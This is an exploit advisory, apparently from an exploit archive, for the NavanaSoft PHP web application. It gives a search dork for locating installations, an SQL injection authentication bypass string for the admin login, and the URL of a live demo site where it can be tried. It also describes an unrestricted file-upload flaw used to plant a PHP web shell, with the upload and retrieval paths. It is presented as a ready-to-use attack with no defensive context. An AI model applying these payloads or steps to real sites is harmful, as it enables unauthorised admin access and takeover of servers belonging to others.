NavanaSoft Auth Bypass vulnerability

====================================
NavanaSoft Auth Bypass vulnerability 
====================================


[?] My home:              [HacKTeach.org & Pal-Li0ns.com & sec-r1z.com]
    [?] For Ask:              [[email protected]                            ]
    [?] Script:               [     NavanaSoft                            ]
    [?] home Script           [ NavanaSoft.com                            ]
    [?] Language:             [ PHP                                       ]
    [?] Founder:              [ Li0n-PaL                                  ]
    [?] Fly t0:               [ Pal-Li0n - Red-D3v1L - ShaDow-D3v1L - Cold-z3ro - Storm - Mr.NJ - j0rd4n14n.r1z-]
    [~] D0rK  :               [powered by NavanaSoft]
 



################# Auth bypass###############


login: ' or 1=1 --

pass: ' or 1=1 --

admin page :    /admin.php

DeMo ~

http://www.midas-bd.com/admin.php


###################  upload vulnerability#################


/insert.image.php


just upload you shell .php


find it here :


/images/additional_images/



#  0day.today [2018-03-01]  #